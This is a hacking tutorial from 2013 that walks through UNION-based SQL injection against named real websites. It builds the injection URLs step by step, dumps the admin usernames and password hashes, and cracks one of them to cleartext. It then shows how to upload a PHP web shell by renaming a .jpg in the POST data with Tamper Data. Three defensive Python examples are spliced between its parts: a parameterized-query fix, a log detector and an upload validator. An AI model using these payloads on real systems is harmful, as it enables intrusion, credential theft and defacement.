xW3s13y

SQL INJECTION + UPLOADING SHELL [ Part 1 & 2 ]

Apr 2nd, 2013
SQL Injection Tutorial :-

This tutorial is only for educational purposes. Kindly do not misuse it.
Log on to http://www.tartanarmy.com/news/news.php?id=130. Basically we are going to send the queries through the URL to get back results on screen accordingly. The motive is to get the name of the table, the name of the column in which usernames and passwords are stored, and finally to fetch them. Instead of copying and pasting the long links, simply click on "click here" and open in a new tab.


Step 1. Find the number of columns.
Let's use the "ORDER BY" clause here; it sorts the result by the column number you give it. Choose any number,
say 10. Here I have assumed that the number of columns can't be more than 10. "--" is used to make anything after it a comment.
Now go to this URL
http://www.tartanarmy.com/news/news.php?id=130 order by 10-- Click here
Actually we instructed it to sort the result by the 10th column. But it returned us an error; this
means the number of columns is less than 10. Let's replace it with 9.

http://www.tartanarmy.com/news/news.php?id=130 order by 9-- But again we got an error. This
means the number of columns is less than 9. Like this we keep on moving, until we don't get any error.
Finally we reach '6':
http://www.tartanarmy.com/news/news.php?id=130 order by 6--
We didn't get any error; this means there are 6 columns.


Step 2. Find vulnerable columns.
Now let's use the "UNION ALL" and "SELECT" commands. Remember to put a dash (-) before 130.
http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,2,3,4,5,6-- Click here
We would get a couple of numbers on screen. The bold ones are the most vulnerable columns.
In this case the most vulnerable is number 2.


Step 3. Find the database version.
Replace the most vulnerable column with "@@version" or "version()" (if the first one doesn't work).
http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,@@version,3,4,5,6-- Click here
We got the version on screen. It is. The only thing to note is that the version is 5 point something, that
is, greater than 5. We would have followed some other approach in case the version was
less than 5, because in versions less than 5 there is no default database like "information_schema" which stores information about the tables/columns of the other databases.


Step 4. Finding table names.
Replace the vulnerable column number with "table_name".
http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,table_name,3,4,5,6 from information_schema.tables where table_schema=database()-- Click here
We got the first table name on the screen.

To get all tables, use group_concat:
http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database()-- Click here


Step 5. Finding column names.
Similarly, get all the columns by simply replacing 'table' with 'column':
http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_schema=database()-- Click here
There is a repeating element, which in this case is 'id'. From it, we come to know which table number
has which columns.


Step 6. Fetching data from columns.
We can fetch the data stored in any column. But the interesting ones here are username and password.
These columns are in the first table, that is tar_admin. "0x3a" is simply used to insert a colon into the result to separate the two values; it is the hex of a colon.

http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,group_concat(username,0x3a,password),3,4,5,6 from tar_admin-- Click Here

So finally we got the usernames and passwords on screen. But the passwords are encrypted.
Mostly these encryptions are crackable. Let's choose any username, say
"Sneds". The password in encrypted form is 7d372d3f4ad3116c9e455b20e946dd15. Let's log on to http://md5crack.com/crackmd5.php and put the hashed (encrypted) password there.
And it would crack it for us. We got 'oorwullie' in the result (the password in clear text).


Note: Hashes are a type of encryption which is irreversible. There are numberless online crackers available. Keep trying. Sometimes very strong hashes cannot be cracked.
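Steps 1 to 6 only work because news.php pastes the id parameter straight into its SQL text, so the ORDER BY probes and the UNION SELECT become part of the query. The following is an added example, not code from the tutorial or from the site it targets: a toy version in Python with sqlite3 standing in for the site's PHP/MySQL stack. The news table, the columns and the stored values are constructed for the demo (only the table name tar_admin comes from the tutorial). It shows the concatenated query beside the parameterized one, fed with the same step-6 style payload.

```python
import sqlite3

# Constructed stand-in for the tutorial's news site: sqlite3 instead of MySQL, and the
# table/column layout is invented for this example (only the name tar_admin is from the tutorial).
def build_demo_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        CREATE TABLE tar_admin (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO news VALUES (130, 'Match report', 'constructed article text');
        INSERT INTO tar_admin VALUES (1, 'demo_user', 'constructed_hash_placeholder');
    """)
    return conn

# Vulnerable form: the id parameter is pasted into the SQL text, so everything after the
# number (ORDER BY probes, UNION SELECT, the trailing -- comment) is parsed as SQL.
def get_news_vulnerable(conn, id_param):
    sql = "SELECT title, body FROM news WHERE id=" + id_param
    return conn.execute(sql).fetchall()

# Hardened form: the value must be a plain integer and is bound as a parameter, so the
# database only ever sees a number, never SQL text supplied by the client.
def get_news_safe(conn, id_param):
    try:
        news_id = int(id_param)
    except (TypeError, ValueError):
        return []  # not an integer id: refuse instead of guessing
    return conn.execute("SELECT title, body FROM news WHERE id=?", (news_id,)).fetchall()

# The tutorial's step-6 payload, adapted to this two-column demo table.
UNION_PAYLOAD = "-130 union select all username, password from tar_admin--"

def demo():
    conn = build_demo_db()
    leaked = get_news_vulnerable(conn, UNION_PAYLOAD)  # admin row comes back in the news columns
    blocked = get_news_safe(conn, UNION_PAYLOAD)       # [] because the payload is not an integer
    normal = get_news_safe(conn, "130")                # the legitimate request still works
    return leaked, blocked, normal

if __name__ == "__main__":
    print(demo())
```

The integer cast is what makes the column counting in step 1 impossible as well: "130 order by 6--" is rejected before any SQL is built. For string parameters the same rule applies with a bound `?` placeholder instead of the cast; the point is that client input is always passed as a value, never spliced into the statement text.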
Where is the login panel or login page of the website?
So you got the key, where is the lock now? Most websites have login pages at default locations.
Take any website, say www.xyz.com. The login page would be at
www.xyz.com/admin , www.xyz.com/administrator , www.xyz.com/adminlogin etc.
Download this admin page finder from here and it would try all these default pages.


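Both halves of Part 1 leave a clear trace in the web server's access log: URL-encoded ORDER BY / UNION SELECT / information_schema strings on one request path, then a burst of 404s on the default admin paths listed above. As an added example (not from the tutorial or any site it names), this Python script parses constructed Apache combined-format lines, decodes the query string, and raises one alert per source address. The log lines, IPs and timestamps are made up for the demo; the signature list is an assumption that covers what the tutorial sends and would need extending for other techniques.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed Apache combined-log lines (documentation IP ranges, invented timestamps)
# replaying the requests the tutorial describes, followed by default admin-path guessing.
SAMPLE_LOG = """\
203.0.113.5 - - [02/Apr/2013:10:01:02 +0000] "GET /news/news.php?id=130 HTTP/1.1" 200 5120
203.0.113.5 - - [02/Apr/2013:10:01:09 +0000] "GET /news/news.php?id=130%20order%20by%2010-- HTTP/1.1" 500 310
203.0.113.5 - - [02/Apr/2013:10:01:40 +0000] "GET /news/news.php?id=-130%20union%20select%20all%201,@@version,3,4,5,6-- HTTP/1.1" 200 4980
203.0.113.5 - - [02/Apr/2013:10:02:11 +0000] "GET /news/news.php?id=-130%20union%20select%20all%201,group_concat(table_name),3,4,5,6%20from%20information_schema.tables%20where%20table_schema=database()-- HTTP/1.1" 200 5010
203.0.113.5 - - [02/Apr/2013:10:05:00 +0000] "GET /admin HTTP/1.1" 404 210
203.0.113.5 - - [02/Apr/2013:10:05:01 +0000] "GET /administrator HTTP/1.1" 404 210
203.0.113.5 - - [02/Apr/2013:10:05:01 +0000] "GET /adminlogin HTTP/1.1" 404 210
198.51.100.7 - - [02/Apr/2013:10:06:30 +0000] "GET /news/news.php?id=131 HTTP/1.1" 200 5300
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Signatures for the UNION-based probing shown in the tutorial; applied after URL decoding.
SQLI_SIGNATURES = {
    "order-by probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "information_schema": re.compile(r"\binformation_schema\b", re.I),
    "version fingerprint": re.compile(r"@@version|\bversion\s*\(\s*\)", re.I),
    "group_concat": re.compile(r"\bgroup_concat\s*\(", re.I),
}
# Default login locations named in the tutorial; 404s here from one address look like guessing.
ADMIN_PROBE_PATHS = {"/admin", "/administrator", "/adminlogin"}

def parse_line(line):
    """Split one combined-log line into fields; returns None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["decoded_path"] = unquote_plus(rec["path"])  # %20 -> space so the signatures can match
    return rec

def sqli_hits(decoded_path):
    """Names of the signatures that fire on one decoded request path."""
    return [name for name, rx in SQLI_SIGNATURES.items() if rx.search(decoded_path)]

def analyse(log_text, probe_threshold=3):
    """Per source IP: count SQLi-signature requests and 404s on admin paths, return alerts."""
    sqli = Counter()
    probes = Counter()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if sqli_hits(rec["decoded_path"]):
            sqli[rec["ip"]] += 1
        bare_path = rec["decoded_path"].split("?", 1)[0].rstrip("/") or "/"
        if rec["status"] == 404 and bare_path.lower() in ADMIN_PROBE_PATHS:
            probes[rec["ip"]] += 1
    alerts = {}
    for ip in sorted(set(sqli) | set(probes)):
        reasons = []
        if sqli[ip]:
            reasons.append(f"{sqli[ip]} SQLi-signature requests")
        if probes[ip] >= probe_threshold:
            reasons.append(f"{probes[ip]} admin-page probes returning 404")
        if reasons:
            alerts[ip] = reasons
    return alerts

if __name__ == "__main__":
    for ip, reasons in analyse(SAMPLE_LOG).items():
        print(ip, "->", "; ".join(reasons))
```

Decoding before matching matters: the payloads arrive as %20-separated strings, and a signature written against the raw line would miss them. The 500 on the ORDER BY line is the same error message the tutorial uses to count columns, so error responses on a parameterised endpoint are a second, independent signal worth graphing.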
UPLOADING YOUR SHELL VIA IMAGES USING TAMPER DATA.


Many times you get the login of a website, but you are unable to upload your PHP shell!
Today I'll show you how to upload your PHP shell through Tamper Data, a Firefox add-on.

Install the Tamper Data Firefox add-on:
Download Tamper Data here: https://addons.mozilla.org/en-us/firefox/addon/tamper-data/
Now install it and restart Firefox.

Rename shell:
Note: You have to rename your .php shell to .jpg to bypass the website's security.
To upload a shell, of course you need an upload option in the login page or anywhere!

Demo:
As an example I'll take - http://freead1.net/post-free-ad-to-USA-42

It is a free classified ads posting website, so I got an upload option there!
Find your upload option, click on Browse, locate your .jpg shell and select it!


Now click on Tools in the Firefox menu bar and select Tamper Data. The Tamper Data plugin will open in a new window!


Before clicking on the Upload button, click on "Start Tamper" in the Tamper Data window.
Note: Before clicking on "Start Tamper", close every extra tab you have opened. If you want this tutorial to stay open, just open it in another browser.

Now click on the upload button!

After clicking on the upload button, the "Tamper with request?" window will appear!
Click on the "Tamper" button.


After a click on "Tamper" you will see the "Tamper Popup".
In the Tamper Popup window, copy the "POST_DATA" text into Notepad.


After copying it to Notepad, find "yourshell.jpg" and rename it to .php.

Now copy Notepad's text back into the "POST_DATA" field and click OK.
It will upload the shell as .php and you can execute it easily!
Find your .php shell & do whatever you wanted with that website.
That's all!
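The Tamper Data step succeeds because the site's "security" is a check on the extension the browser reports, and that filename travels in POST_DATA where the client can edit it. The following added example (mine, not the ad site's code nor anything from the tutorial) shows the server-side rule that closes this: decide the file type from the bytes, ignore the client's filename and Content-Type except for logging, and let the server pick the stored name. The image signatures are the standard JPEG/PNG/GIF magic numbers; the sample inputs are constructed, and the script-marker scan is a heuristic I added for polyglots, not a complete parser.

```python
import os
import secrets

# Image types the server is willing to store, keyed by the extension the SERVER assigns,
# with the leading bytes (magic numbers) the content must start with.
IMAGE_SIGNATURES = {
    "jpg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}
# Heuristic: an image header followed by server-side script text is a polyglot; refuse it.
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<script")

def detect_image_type(data):
    """Return 'jpg', 'png' or 'gif' from the file's own bytes, or None if it is none of them."""
    for ext, sigs in IMAGE_SIGNATURES.items():
        if any(data.startswith(s) for s in sigs):
            return ext
    return None

def validate_upload(client_filename, client_content_type, data):
    """Decide whether to store an upload. Returns (accepted, reason, server_filename).

    client_filename and client_content_type are exactly the fields the tutorial rewrites in
    POST_DATA, so they are untrusted hints: echoed in the reason for the audit log, never
    used to choose the stored extension.
    """
    hinted_ext = os.path.splitext(client_filename)[1].lower()
    hint = f"client hinted {hinted_ext!r}, {client_content_type!r}"
    detected = detect_image_type(data)
    if detected is None:
        return False, f"rejected: content is not an image ({hint})", None
    if any(marker in data for marker in SCRIPT_MARKERS):
        return False, f"rejected: script marker inside image data ({hint})", None
    # The server chooses the stored name: random token plus the extension derived from content.
    server_name = f"{secrets.token_hex(16)}.{detected}"
    return True, f"accepted: stored as {detected} ({hint})", server_name

# Constructed test inputs: a JPEG-looking header with padding, and a placeholder for what a
# renamed PHP file would carry (just an opening tag and a comment, nothing executable of note).
FAKE_JPEG = b"\xff\xd8\xff\xe0" + b"\x00" * 16
PHP_TEXT = b"<?php /* constructed placeholder */ ?>"

def demo():
    """Run the four cases the tutorial's trick relies on; returns accept/reject per case."""
    return {
        "php renamed to .jpg": validate_upload("shell.jpg", "image/jpeg", PHP_TEXT)[0],
        "php with .php restored": validate_upload("shell.php", "image/jpeg", PHP_TEXT)[0],
        "real image, odd name": validate_upload("photo.php", "text/plain", FAKE_JPEG)[0],
        "jpeg/php polyglot": validate_upload("photo.jpg", "image/jpeg", FAKE_JPEG + PHP_TEXT)[0],
    }

if __name__ == "__main__":
    for case, accepted in demo().items():
        print(f"{case}: {'accepted' if accepted else 'rejected'}")
```

Renaming the file on the server is the half of this that defeats the POST_DATA edit: whatever extension the client restores, the stored object is called `<random>.jpg`. The usual companion control is to keep the upload directory outside the script handler's reach (no PHP execution there), so that even a file the signature check misjudges is served as static bytes rather than run.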



THERE'S A PART 3 OF IT: UPLOADING YOUR DEFACEMENT PAGE!

~ xW3s13y